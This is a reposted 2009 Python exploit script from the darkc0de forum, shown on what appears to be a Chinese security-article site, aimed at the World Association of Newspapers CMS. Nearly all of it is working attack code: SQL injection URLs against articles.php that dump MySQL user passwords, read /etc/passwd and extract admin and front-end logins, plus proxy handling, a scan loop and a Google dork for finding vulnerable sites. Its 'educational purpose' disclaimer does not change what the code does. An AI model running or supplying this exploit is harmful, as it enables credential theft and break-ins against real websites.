World Association of Newspapers remote SQL injection exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容
World Association of Newspapers remote SQL injection exploit
来源：http://www.darkc0de.com/ 作者：baltazar 发布时间：2009-01-12
#!/usr/bin/python
# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# !!! Special thanx for d3hydr8 and rsauron who inspired me !!! 
#
################################################################ 
#       .___             __          _______       .___        # 
#     __| _/____ _______|  | __ ____ \   _  \    __| _/____    # 
#    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
#   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
#   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
#        \/                  \/             \/                 # 
#                   ___________   ______  _  __                # 
#                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
#                 \  \___|  | \/\  ___/\     /                 # 
#                  \___  >__|    \___  >\/\_/                  # 
#      est.2007        \/            \/   forum.darkc0de.com   # 
################################################################ 
# ---  d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # 
# ---  QKrun1x  - skillfaker - Croathack - Optyx - Nuclear     #
# ---  Eliminator and to all members of darkc0de and ljuska.org#                                                             #
################################################################ 

import sys, os, time, re, urllib2, httplib, socket

if sys.platform == 'linux' or sys.platform == 'linux2':
	clearing = 'clear'
else:
	clearing = 'cls'
os.system(clearing)

proxy = "None"
count = 0

if len(sys.argv) < 2 or len(sys.argv) > 4:
	print "\n|---------------------------------------------------------------|"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   01/2009      World Association of Newspapers                |"
	print "| Help: wan.py -h                                               |"
	print "| Visit www.darkc0de.com and www.ljuska.org                     |"
        print "|---------------------------------------------------------------|\n"
	sys.exit(1)
	
for arg in sys.argv:
	if arg == '-h':
		print "\n|-------------------------------------------------------------------------------|"
                print "| b4ltazar[@]gmail[dot]com                                                      |"
                print "|   01/2009      World Association of Newspapers                                |"
                print "| Usage: wan.py www.site.com                                                    |"
	        print "| Example: wan.py  www.beijing2008conference.com                                |"
	        print "| Visit www.darkc0de.com and www.ljuska.org                                     |"
                print "|-------------------------------------------------------------------------------|\n"
		sys.exit(1)
	elif arg == '-p':
		proxy = sys.argv[count+1]
	count += 1
	
site = sys.argv[1]
if site[:4] != "http":
	site = "http://"+site
if site[-1] != "/":
	site = site+"/"
	
vulnsql = ["articles.php?id=38+and+1=2+union+all+select+concat_ws(char(58),user,password,0x62616c74617a6172),1,2,3,4,5,6+from+mysql.user--","articles.php?id=26+and+1=2+union+all+select+load_file(0x2f6574632f706173737764),0x62616c74617a6172,2,3,4,5,6--","articles.php?id=26+and+1=2+union+all+select+0,concat_ws(char(58),buser_login,buser_passwd,0x62616c74617a6172),2,3,4,5,6+from+Back_users--","articles.php?id=26+and+1=2+union+all+select+0,concat_ws(char(58),fuser_login,fuser_passwd,0x62616c74617a6172),2,3,4,5,6+from+Front_users--"]

print "\n|---------------------------------------------------------------|"
print "| b4ltazar[@]gmail[dot]com                                      |"
print "|   01/2009      World Association of Newspapers                |"
print "| Visit www.darkc0de.com and www.ljuska.org                     |"
print "|---------------------------------------------------------------|\n"
print "\n[-] %s" % time.strftime("%X")

socket.setdefaulttimeout(20)
try:
	if proxy != "None":
		print "[+] Proxy:",proxy
		print "\n[+] Testing Proxy..."
		pr = httplib.HTTPConnection(proxy)
		pr.connect()
		proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
		proxyfier = urllib2.build_opener(proxy_handler)
		proxyfier.open("http://www.google.com")
		print
		print "\t[!] w00t!,w00t! Proxy: "+proxy+" Working"
		print
	else:
		print "[-] Proxy not given"
		print
		proxy_handler = ""
except(socket.timeout):
		print
		print "\t[-] Proxy Timed Out"
		print
		sys.exit(1)
except(),msg:
		print msg
		print "\t[-] Proxy Failed"
		print
		sys.exit(1)
		
try:
	url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address="
except(IndexError):
	print "[-] Wtf?"
proxyfier = urllib2.build_opener(proxy_handler)
proxy_check = proxyfier.open(url).readlines()
for line in proxy_check:
	if re.search("<br><br>", line):
		line = line.replace("</b>","").replace('<br>',"").replace('<b>',"")
		print "\n[!]",line,"\n"	
		
print "[+] Target:",site
print "[+]",len(vulnsql),"Vulns loaded..."
print "[+] Starting Scan..\n"	

for sql in vulnsql:
	print "[+] Checking:",site+sql.replace("\n","")
	print
	try:
		source = proxyfier.open(site+sql.replace("\n", "")).read()
		search = re.findall("baltazar",source)
		if len(search) > 0:
			print "[!] w00t!w00t" ,site+sql.replace("\n", "")
			print
	except(KeyboardInterrupt, SystemExit):
			raise
	except:
			pass
	
	
print
print
print
print "\tDork : inurl:/articles.php?id= intext:WAN"
print
print "Check for more details:  http://packetstormsecurity.org/0809-exploits/wan-sql.txt"
print "\n[-] %s" % time.strftime("%X")
[